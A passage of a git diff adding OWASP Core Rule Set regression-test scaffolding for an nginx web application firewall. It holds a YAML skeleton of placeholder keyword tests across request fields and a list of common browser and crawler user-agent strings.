"skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"skeletonkeyword\"}" + output: + log_contains: "id \"skeletonid\"" + + - + test_title: skeletonid-skeletontest + desc: "Content-Type application/json arg name includes keyword skeletonkeyword" + stages: + - + stage: + input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"skeletonkeyword\": \"test\"}" + output: + log_contains: "id \"skeletonid\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/positivetest.yaml.skeleton b/nginx/config/owasp-crs/tests/regression/tests/positivetest.yaml.skeleton new file mode 100644 index 00000000..83f0b2de --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/positivetest.yaml.skeleton 
@@ -0,0 +1,393 @@
+ -
+ test_title: skeletonid-skeletontest
+ desc: "Argument test includes keyword skeletonkeyword"
+ stages:
+ -
+ stage:
+ input:
+ dest_addr: "skeletondefaultaddr"
+ port: skeletondefaultport
+ headers:
+ Host: "skeletondefaulthost"
+ User-Agent: "skeletondefaultuseragent"
+ Accept: "skeletondefaultaccept"
+ Accept-Charset: "skeletondefaultacceptcharset"
+ Accept-Encoding: "skeletondefaultacceptencoding"
+ Accept-Language: "skeletondefaultacceptlanguage"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=skeletonkeyword"
+ output:
+ log_contains: "id \"skeletonid\""
+
+ -
+ test_title: skeletonid-skeletontest
+ desc: "Argument name includes keyword skeletonkeyword"
+ stages:
+ -
+ stage:
+ input:
+ dest_addr: "skeletondefaultaddr"
+ port: skeletondefaultport
+ headers:
+ Host: "skeletondefaulthost"
+ User-Agent: "skeletondefaultuseragent"
+ Accept: "skeletondefaultaccept"
+ Accept-Charset: "skeletondefaultacceptcharset"
+ Accept-Encoding: "skeletondefaultacceptencoding"
+ Accept-Language: "skeletondefaultacceptlanguage"
+ Content-Type: "skeletondefaultcontenttype"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "skeletonkeyword=test"
+ output:
+ log_contains: "id \"skeletonid\""
+
+ -
+ test_title: skeletonid-skeletontest
+ desc: "Cookie test includes keyword skeletonkeyword"
+ stages:
+ -
+ stage:
+ input:
+ dest_addr: "skeletondefaultaddr"
+ port: skeletondefaultport
+ headers:
+ Host: "skeletondefaulthost"
+ User-Agent: "skeletondefaultuseragent"
+ Accept: "skeletondefaultaccept"
+ Accept-Charset: "skeletondefaultacceptcharset"
+ Accept-Encoding: "skeletondefaultacceptencoding"
+ Accept-Language: "skeletondefaultacceptlanguage"
+ Content-Type: "skeletondefaultcontenttype"
+ Cookie: test=skeletonkeyword
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"skeletonid\""
+
+ -
+ test_title: skeletonid-skeletontest
+ desc: "Cookie name includes keyword skeletonkeyword"
+ stages:
+ -
+ stage:
+ input:
+ dest_addr: "skeletondefaultaddr"
+ port: skeletondefaultport
+ headers:
+ Host: "skeletondefaulthost"
+ User-Agent: "skeletondefaultuseragent"
+ Accept: "skeletondefaultaccept"
+ Accept-Charset: "skeletondefaultacceptcharset"
+ Accept-Encoding: "skeletondefaultacceptencoding"
+ Accept-Language: "skeletondefaultacceptlanguage"
+ Content-Type: "skeletondefaultcontenttype"
+ Cookie: skeletonkeyword=test
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"skeletonid\""
+
+ -
+ test_title: skeletonid-skeletontest
+ desc: "Request header test includes keyword skeletonkeyword"
+ stages:
+ -
+ stage:
+ input:
+ dest_addr: "skeletondefaultaddr"
+ port: skeletondefaultport
+ headers:
+ Host: "skeletondefaulthost"
+ User-Agent: "skeletondefaultuseragent"
+ Accept: "skeletondefaultaccept"
+ Accept-Charset: "skeletondefaultacceptcharset"
+ Accept-Encoding: "skeletondefaultacceptencoding"
+ Accept-Language: "skeletondefaultacceptlanguage"
+ Content-Type: "skeletondefaultcontenttype"
+ test: skeletonkeyword
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"skeletonid\""
+
+ -
+ test_title: skeletonid-skeletontest
+ desc: "XML element includes keyword skeletonkeyword"
+ stages:
+ -
+ stage:
+ input:
+ dest_addr: "skeletondefaultaddr"
+ port: skeletondefaultport
+ headers:
+ Host: "skeletondefaulthost"
+ User-Agent: "skeletondefaultuseragent"
+ Accept: "skeletondefaultaccept"
+ Accept-Charset: "skeletondefaultacceptcharset"
+ Accept-Encoding: "skeletondefaultacceptencoding"
+ Accept-Language: "skeletondefaultacceptlanguage"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "value"
+ output:
+ no_log_contains: "id \"skeletonid\""
+
+ -
+ test_title: skeletonid-skeletontest
+ desc: "XML attribute name includes keyword skeletonkeyword"
+ stages:
+ -
+ stage:
+ input:
+ dest_addr: "skeletondefaultaddr"
+ port: skeletondefaultport
+ headers:
+ Host: "skeletondefaulthost"
+ User-Agent: "skeletondefaultuseragent"
+ Accept: "skeletondefaultaccept"
+ Accept-Charset: "skeletondefaultacceptcharset"
+ Accept-Encoding: "skeletondefaultacceptencoding"
+ Accept-Language: "skeletondefaultacceptlanguage"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "element_value"
+ output:
+ no_log_contains: "id \"skeletonid\""
+
+ -
+ test_title: skeletonid-skeletontest
+ desc: "XML attribute value includes keyword skeletonkeyword"
+ stages:
+ -
+ stage:
+ input:
+ dest_addr: "skeletondefaultaddr"
+ port: skeletondefaultport
+ headers:
+ Host: "skeletondefaulthost"
+ User-Agent: "skeletondefaultuseragent"
+ Accept: "skeletondefaultaccept"
+ Accept-Charset: "skeletondefaultacceptcharset"
+ Accept-Encoding: "skeletondefaultacceptencoding"
+ Accept-Language: "skeletondefaultacceptlanguage"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "element_value"
+ output:
+ log_contains: "id \"skeletonid\""
+
+ -
+ test_title: skeletonid-skeletontest
+ desc: "XML element value includes keyword skeletonkeyword"
+ stages:
+ -
+ stage:
+ input:
+ dest_addr: "skeletondefaultaddr"
+ port: skeletondefaultport
+ headers:
+ Host: "skeletondefaulthost"
+ User-Agent: "skeletondefaultuseragent"
+ Accept: "skeletondefaultaccept"
+ Accept-Charset: "skeletondefaultacceptcharset"
+ Accept-Encoding: "skeletondefaultacceptencoding"
+ Accept-Language: "skeletondefaultacceptlanguage"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "skeletonkeyword"
+ output:
+ log_contains: "id \"skeletonid\""
+
+ -
+ test_title: skeletonid-skeletontest
+ desc: "Nested XML element value includes keyword skeletonkeyword"
+ stages:
+ -
+ stage:
+ input:
+ dest_addr: "skeletondefaultaddr"
+ port: skeletondefaultport
+ headers:
+ Host: "skeletondefaulthost"
+ User-Agent: "skeletondefaultuseragent"
+ Accept: "skeletondefaultaccept"
+ Accept-Charset: "skeletondefaultacceptcharset"
+ Accept-Encoding: "skeletondefaultacceptencoding"
+ Accept-Language: "skeletondefaultacceptlanguage"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "skeletonkeyword"
+ output:
+ log_contains: "id \"skeletonid\""
+
+ -
+ test_title: skeletonid-skeletontest
+ desc: "Content-Type text/plain includes keyword skeletonkeyword"
+ stages:
+ -
+ stage:
+ input:
+ dest_addr: "skeletondefaultaddr"
+ port: skeletondefaultport
+ headers:
+ Host: "skeletondefaulthost"
+ User-Agent: "skeletondefaultuseragent"
+ Accept: "skeletondefaultaccept"
+ Accept-Charset: "skeletondefaultacceptcharset"
+ Accept-Encoding: "skeletondefaultacceptencoding"
+ Accept-Language: "skeletondefaultacceptlanguage"
+ Content-Type: "text/plain"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=skeletonkeyword"
+ output:
+ log_contains: "id \"skeletonid\""
+
+ -
+ test_title: skeletonid-skeletontest
+ desc: "Content-Type application/json arg value includes keyword skeletonkeyword"
+ stages:
+ -
+ stage:
+ input:
+ dest_addr: "skeletondefaultaddr"
+ port: skeletondefaultport
+ headers:
+ Host: "skeletondefaulthost"
+ User-Agent: "skeletondefaultuseragent"
+ Accept: "skeletondefaultaccept"
+ Accept-Charset: "skeletondefaultacceptcharset"
+ Accept-Encoding: "skeletondefaultacceptencoding"
+ Accept-Language: "skeletondefaultacceptlanguage"
+ Content-Type: "application/json"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "{\"test\": \"skeletonkeyword\"}"
+ output:
+ log_contains: "id \"skeletonid\""
+
+ -
+ test_title: skeletonid-skeletontest
+ desc: "Content-Type application/json arg name includes keyword skeletonkeyword"
+ stages:
+ -
+ stage:
+ input:
+ dest_addr: "skeletondefaultaddr"
+ port: skeletondefaultport
+ headers:
+ Host: "skeletondefaulthost"
+ User-Agent: "skeletondefaultuseragent"
+ Accept: "skeletondefaultaccept"
+ Accept-Charset: "skeletondefaultacceptcharset"
+ Accept-Encoding: "skeletondefaultacceptencoding"
+ Accept-Language: "skeletondefaultacceptlanguage"
+ Content-Type: "application/json"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "{\"skeletonkeyword\": \"test\"}"
+ output:
+ log_contains: "id \"skeletonid\""
+
+ -
+ test_title: skeletonid-skeletontest
+ desc: "Content-Type multipart/form-data json arg name includes keyword skeletonkeyword"
+ stages:
+ -
+ stage:
+ input:
+ dest_addr: "skeletondefaultaddr"
+ port: skeletondefaultport
+ headers:
+ Host: "skeletondefaulthost"
+ User-Agent: "skeletondefaultuseragent"
+ Accept: "skeletondefaultaccept"
+ Accept-Charset: "skeletondefaultacceptcharset"
+ Accept-Encoding: "skeletondefaultacceptencoding"
+ Accept-Language: "skeletondefaultacceptlanguage"
+ Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/json\n\n{\"skeletonkeyword\": \"test\"}\n-----------------------------thisissparta--"
+ output:
+ log_contains: "id \"skeletonid\""
+
+ -
+ test_title: skeletonid-skeletontest
+ desc: "Content-Type multipart/form-data json arg value includes keyword skeletonkeyword"
+ stages:
+ -
+ stage:
+ input:
+ dest_addr: "skeletondefaultaddr"
+ port: skeletondefaultport
+ headers:
+ Host: "skeletondefaulthost"
+ User-Agent: "skeletondefaultuseragent"
+ Accept: "skeletondefaultaccept"
+ Accept-Charset: "skeletondefaultacceptcharset"
+ Accept-Encoding: "skeletondefaultacceptencoding"
+ Accept-Language: "skeletondefaultacceptlanguage"
+ Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/json\n\n{\"skeletonkeyword\": \"test\"}\n-----------------------------thisissparta--"
+ output:
+ log_contains: "id \"skeletonid\""
+
+ -
+ test_title: skeletonid-skeletontest
+ desc: "Content-Type multipart/form-data XML element value includes keyword skeletonkeyword"
+ stages:
+ -
+ stage:
+ input:
+ dest_addr: "skeletondefaultaddr"
+ port: skeletondefaultport
+ headers:
+ Host: "skeletondefaulthost"
+ User-Agent: "skeletondefaultuseragent"
+ Accept: "skeletondefaultaccept"
+ Accept-Charset: "skeletondefaultacceptcharset"
+ Accept-Encoding: "skeletondefaultacceptencoding"
+ Accept-Language: "skeletondefaultacceptlanguage"
+ Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/xml\n\nskeletonkeyword\n-----------------------------thisissparta--"
+ output:
+ log_contains: "id \"skeletonid\""
+
+ -
+ test_title: skeletonid-skeletontest
+ desc: "Content-Type multipart/form-data XML element value includes keyword skeletonkeyword"
+ stages:
+ -
+ stage:
+ input:
+ dest_addr: "skeletondefaultaddr"
+ port: skeletondefaultport
+ headers:
+ Host: "skeletondefaulthost"
+ User-Agent: "skeletondefaultuseragent"
+ Accept: "skeletondefaultaccept"
+ Accept-Charset: "skeletondefaultacceptcharset"
+ Accept-Encoding: "skeletondefaultacceptencoding"
+ Accept-Language: "skeletondefaultacceptlanguage"
+ Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/xml\n\nskeletonkeyword\n-----------------------------thisissparta--"
+ output:
+ log_contains: "id \"skeletonid\""
diff --git a/nginx/config/owasp-crs/tests/regression/utils/data/popularUAs.data b/nginx/config/owasp-crs/tests/regression/utils/data/popularUAs.data
new file mode 100644
index 00000000..bb6f417c
--- /dev/null
+++ b/nginx/config/owasp-crs/tests/regression/utils/data/popularUAs.data 
@@ -0,0 +1,588 @@ +AdsBot-Google ( http://www.google.com/adsbot.html) +Avant Browser/1.2.789rel1 (http://www.avantbrowser.com) +Baiduspider ( http://www.baidu.com/search/spider.htm) +BlackBerry7100i/4.1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/103 +BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/5.0.3.3 UP.Link/5.1.2.12 (Google WAP Proxy/1.0) +BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0 +BlackBerry8320/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/100 +BlackBerry8330/4.3.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/105 +BlackBerry9000/4.6.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102 +BlackBerry9530/4.7.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102 UP.Link/6.3.1.20.0 +BlackBerry9700/5.0.0.351 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/123 +Bloglines/3.1 (http://www.bloglines.com) +CSSCheck/1.2.2 +DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html) +DoCoMo/2.0 SH901iC(c100;TB;W24H12) +Download Demon/3.5.0.11 +ELinks (0.4.3; NetBSD 3.0.2PATCH sparc64; 141x19) +ELinks (0.4pre5; Linux 2.6.10-ac7 i686; 80x33) +ELinks/0.12~pre5-4 +ELinks/0.9.3 (textmode; Linux 2.6.9-kanotix-8 i686; 127x41) +EmailWolf 1.00 +FAST-WebCrawler/3.8 (crawler at trd dot overture dot com; http://www.alltheweb.com/help/webmaster/crawler) +FeedFetcher-Google; ( http://www.google.com/feedfetcher.html) +Gaisbot/3.0 (robot@gais.cs.ccu.edu.tw; http://gais.cs.ccu.edu.tw/robot.php) +Googlebot-Image/1.0 +Googlebot-News +Googlebot-Video/1.0 +Googlebot/2.1 ( http://www.googlebot.com/bot.html) +Gregarius/0.5.2 ( http://devlog.gregarius.net/docs/ua) +Gulper Web Bot 0.2.4 (www.ecsl.cs.sunysb.edu/~maxim/cgi-bin/Link/GulperBot) +HTC-ST7377/1.59.502.3 (67150) Opera/9.50 (Windows NT 5.1; U; en) UP.Link/6.3.1.17.0 +HTC_Dream Mozilla/5.0 (Linux; U; Android 1.5; en-ca; Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile 
Safari/525.20.1 +HTC_Dream Mozilla/5.0 (Linux; U; Android 1.5; en-ca; Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +HTMLParser/1.6 +Java/1.6.0_13 +Jigsaw/2.2.5 W3C_CSS_Validator_JFouffa/2.0 +Konqueror/3.0-rc4; (Konqueror/3.0-rc4; i686 Linux;;datecode) +LG-GC900/V10a Obigo/WAP2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1 +LG-LX550 AU-MIC-LX550/2.0 MMP/2.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 +Links (2.1pre15; FreeBSD 5.3-RELEASE i386; 196x84) +Links (2.1pre15; Linux 2.4.26 i686; 158x61) +Links (2.3pre1; Linux 2.6.38-8-generic x86_64; 170x48) +Links/0.9.1 (Linux 2.4.24; i386;) +Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12 +Lynx/2.8.7dev.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8d +MOT-L7v/08.B7.5DR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0 +MOT-V177/0.1.75 UP.Browser/6.2.3.9.c.12 (GUI) MMP/2.0 UP.Link/6.3.1.13.0 +MOT-V9mm/00.62 UP.Browser/6.2.3.4.c.1.123 (GUI) MMP/2.0 +MOTORIZR-Z8/46.00.00 Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; 356) Opera 8.65 [it] UP.Link/6.3.0.0.0 +MSIE (MSIE 6.0; X11; Linux; i686) Opera 7.23 +Mediapartners-Google +Microsoft URL Control - 6.00.8862 +Midori/0.1.10 (X11; Linux i686; U; en-us) WebKit/(531).(2) +Mozilla/1.22 (compatible; MSIE 5.01; PalmOS 3.0) EudoraWeb 2.1 +Mozilla/2.0 (compatible; Ask Jeeves/Teoma) +Mozilla/2.02E (Win95; U) +Mozilla/3.0 (compatible; NetPositive/2.1.1; BeOS) +Mozilla/3.01Gold (Win95; I) +Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0 +Mozilla/4.0 (PSP (PlayStation Portable); 2.00) +Mozilla/4.0 (compatible; Dillo 3.0) +Mozilla/4.0 (compatible; GoogleToolbar 4.0.1019.5266-big; Windows XP 5.1; MSIE 6.0.2900.2180) +Mozilla/4.0 (compatible; Linux 2.6.22) NetFront/3.4 Kindle/2.0 (screen 600x800) +Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; MDA Pro/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1) +Mozilla/4.0 (compatible; MSIE 5.0; Series80/2.0 Nokia9500/4.51 Profile/MIDP-2.0 Configuration/CLDC-1.1) 
+Mozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC) +Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90) +Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0 ) +Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; PalmSource/hspr-H102; Blazer/4.0) 16;320x320 +Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; PalmSource/hspr-H102; Blazer/4.0) 16;320x320 +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.12; Microsoft ZuneHD 4.3) +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.12; Microsoft ZuneHD 4.3) +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.12; Microsoft ZuneHD 4.3) +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) Sprint:PPC6800 +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) Sprint:PPC6800 +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) XV6800 +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 8.12; MSIEMobile6.0) +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.0 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) +Mozilla/4.0 (compatible; MSIE 6.0; j2me) ReqwirelessWeb/3.5 +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser; Avant Browser; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0) +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0) +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Maxthon 2.0) +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0) +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Trident/7.0; .NET4.0E; .NET4.0C) +Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0) +Mozilla/4.0 
(compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0) Asus;Galaxy6 +Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0) Asus;Galaxy6 +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0) +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0) +Mozilla/4.1 (compatible; MSIE 5.0; Symbian OS; Nokia 6600;452) Opera 6.20 [en-US] +Mozilla/4.77 [en] (X11; I; IRIX;64 6.5 IP30) +Mozilla/4.8 [en] (Windows NT 5.1; U) +Mozilla/4.8 [en] (X11; U; SunOS; 5.7 sun4u) +Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0 +Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1 +Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1 +Mozilla/5.0 (BB10; Touch) AppleWebKit/537.10+ (KHTML, like Gecko) Version/10.1.0.2342 Mobile Safari/537.10+ +Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20060702 SeaMonkey/1.5a +Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1 (KHTML, Like Gecko) Version/6.0.0.141 Mobile Safari/534.1 +Mozilla/5.0 (Linux U; en-US) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) Version/4.0 Kindle/3.0 (screen 600x800; rotate) +Mozilla/5.0 (Linux; Android 4.1.2; SHV-E250S Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.82 Mobile Safari/537.36 +Mozilla/5.0 (Linux; Android 4.4; Nexus 5 Build/BuildID) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 +Mozilla/5.0 (Linux; Android 4.4; Nexus 5 Build/BuildID) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 +Mozilla/5.0 (Linux; U; Android 0.5; en-us) AppleWebKit/522 (KHTML, like Gecko) Safari/419.3 +Mozilla/5.0 (Linux; U; Android 1.0; en-us; dream) AppleWebKit/525.10 (KHTML, like 
Gecko) Version/3.0.4 Mobile Safari/523.12.2 +Mozilla/5.0 (Linux; U; Android 1.1; en-gb; dream) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2 +Mozilla/5.0 (Linux; U; Android 1.5; de-ch; HTC Hero Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.5; de-de; Galaxy Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.5; de-de; Galaxy Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.5; de-de; HTC Magic Build/PLAT-RC33) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 FirePHP/0.3 +Mozilla/5.0 (Linux; U; Android 1.5; en-gb; T-Mobile_G2_Touch Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.5; en-us; SPH-M900 Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.5; en-us; T-Mobile G1 Build/CRB43) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari 525.20.1 +Mozilla/5.0 (Linux; U; Android 1.5; en-us; htc_bahamas Build/CRB17) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.5; en-us; sdk Build/CUPCAKE) AppleWebkit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.5; fr-fr; GT-I5700 Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.6; en-us; HTC_TATTOO_A3288 Build/DRC79) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.6; en-us; SonyEricssonX10i Build/R1AA056) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.6; es-es; SonyEricssonX10i Build/R1FA016) 
AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 2.0.1; de-de; Milestone Build/SHOLS_U2_01.14.0) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.0; en-us; Droid Build/ESD20) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.0; en-us; Droid Build/ESD20) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.0; en-us; Droid Build/ESD20) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.0; en-us; Milestone Build/ SHOLS_U2_01.03.1) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.1-update1; de-de; HTC Desire 1.19.161.5 Build/ERE27) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.1; en-us; HTC Legend Build/cupcake) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.1; en-us; Nexus One Build/ERD62) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.1; en-us; Nexus One Build/ERD62) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.2; en-ca; GT-P1000M Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-ca; GT-P1000M Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-ca; GT-P1000M Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-us; ADR6300 Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-us; ADR6300 Build/FRF91) AppleWebKit/533.1 (KHTML, 
